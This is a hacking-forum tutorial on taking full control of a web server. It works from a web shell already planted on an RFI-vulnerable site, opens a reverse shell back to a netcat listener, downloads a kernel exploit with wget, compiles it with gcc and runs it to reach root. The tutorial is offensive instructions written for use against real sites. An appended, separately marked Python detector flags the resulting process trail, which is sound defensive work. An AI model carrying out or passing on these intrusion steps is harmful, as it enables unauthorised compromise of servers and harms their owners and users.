Hi Guys... This Is DJ Alone... Let's ROOT a Server As I Promised... It Looks Hard... But It Isn't...
Things Required :-
1. Netcat (for Windows or Linux)
2. Shelled Site (use I-47 or Mulci Shell)
3. RFI Vulnerable Site
4. Good Understanding Brain...
Open Your Shell & Go To 'Backdoor Host' Tab... And Forward a Port.
Now Go to The 'Back Connect' tab & Enter The Following Details There...
1. Your I.P. address
2. The port you forwarded
Now go to CMD and type in:
cd 'Path to your Netcat.exe'
After opening netcat you need to make it listen on the port you forwarded earlier.
For doing this type the command given below in netcat -
nc -l -n -v -p port
It should look like this -
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.
C:\FeAR>cd C:\
C:\>cd WINDOWS
C:\WINDOWS>nc -l -n -v -p 4444
listening on [any] 4444 ...
Now that you have Netcat listening on the port you forwarded, click on 'Connect'.
I hope you are connected by now...
Type 'whoami'...
Now it's time for the hardest part of the tutorial...
Time to find an exploit to root the box. For this you have to know its kernel version... Use the below code to find that -
'uname -a'
It should look like this -
Linux linux1.dmehosting.com 2.6.17-92.1.10.el5PAE #1 SMP Tue Aug 5 08:14:05 EDT 2008 i686
Now go on http://exploit-db.com/ and search for '2.6.17'.
You will get this -
http://www.exploit-db.com/exploits/5092/
Now in your netcat window type this -
'wget http://www.exploit-db.com/exploits/5092/'
Code:
wget http://xpl_url.com
For the exploit to work, you have to compile it on the server (gcc) and execute it via exploit (-o)
For doing this you have to type -
'gcc 5092 -o exploit'
Add 5092 after the url path
http://site.com/5092
Now you can execute your exploit by typing './exploit'
Wait for the exploit to finish and type root again.
You should witness something like this -
uid=0(root) gid=0(root) groups=500(apache)
This shows that you have successfully rooted the server.
There are many more ways to do this... But this one is the best & most efficient...
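Seen from the server's side, the steps above leave a recognisable process trail: the web server account starts a shell, runs whoami, uname, wget and gcc, and then a root process appears as the child of a web-account process. The following is an added example, not part of the original post, that flags that trail; the event format, field names, rule names and sample events are constructed for illustration, and the account name apache and daemon name httpd are assumptions.

```python
# Added example: flag the process trail the walkthrough leaves on the server.
WEB_USER = "apache"    # assumption: web server account, as in the page's id output
WEB_DAEMON = "httpd"   # assumption: web server process name
SHELLS = {"sh", "bash"}
# Commands the walkthrough runs through the shell; unusual for a web account.
TOOLS = {"whoami", "uname", "wget", "gcc", "nc", "id"}

# Constructed process events in a simplified key=value form (not a real audit format).
SAMPLE = """\
ts=100 pid=900 ppid=1 user=root comm=httpd
ts=101 pid=910 ppid=900 user=apache comm=httpd
ts=205 pid=1200 ppid=910 user=apache comm=sh
ts=206 pid=1201 ppid=1200 user=apache comm=whoami
ts=207 pid=1202 ppid=1200 user=apache comm=uname
ts=230 pid=1203 ppid=1200 user=apache comm=wget
ts=240 pid=1204 ppid=1200 user=apache comm=gcc
ts=250 pid=1205 ppid=1200 user=apache comm=exploit
ts=251 pid=1206 ppid=1205 user=root comm=sh
ts=300 pid=1300 ppid=1 user=root comm=crond
"""

def parse(text):
    """Turn each non-empty line into a dict of its key=value fields."""
    return [dict(f.split("=", 1) for f in line.split())
            for line in text.splitlines() if line.strip()]

def detect(events, web_user=WEB_USER):
    """Return (rule, pid) alerts for web-account activity that matches the trail."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent is None:          # parent not in the capture (e.g. init)
            continue
        if e["user"] == web_user and parent["comm"] == WEB_DAEMON and e["comm"] in SHELLS:
            alerts.append(("shell-from-webserver", e["pid"]))
        elif e["user"] == web_user and e["comm"] in TOOLS:
            alerts.append(("tool-as-web-user", e["pid"]))
        elif e["user"] == "root" and parent["user"] == web_user:
            # A root process born from a web-account process; allow-list any
            # setuid helpers the site legitimately uses before alerting on this.
            alerts.append(("root-child-of-web-user", e["pid"]))
    return alerts

if __name__ == "__main__":
    for rule, pid in detect(parse(SAMPLE)):
        print(f"ALERT {rule} pid={pid}")
```

The last rule corresponds to the 'uid=0(root) gid=0(root) groups=500(apache)' output shown above: a root identity that still carries the web account's group is the sign that the escalation started from the web server.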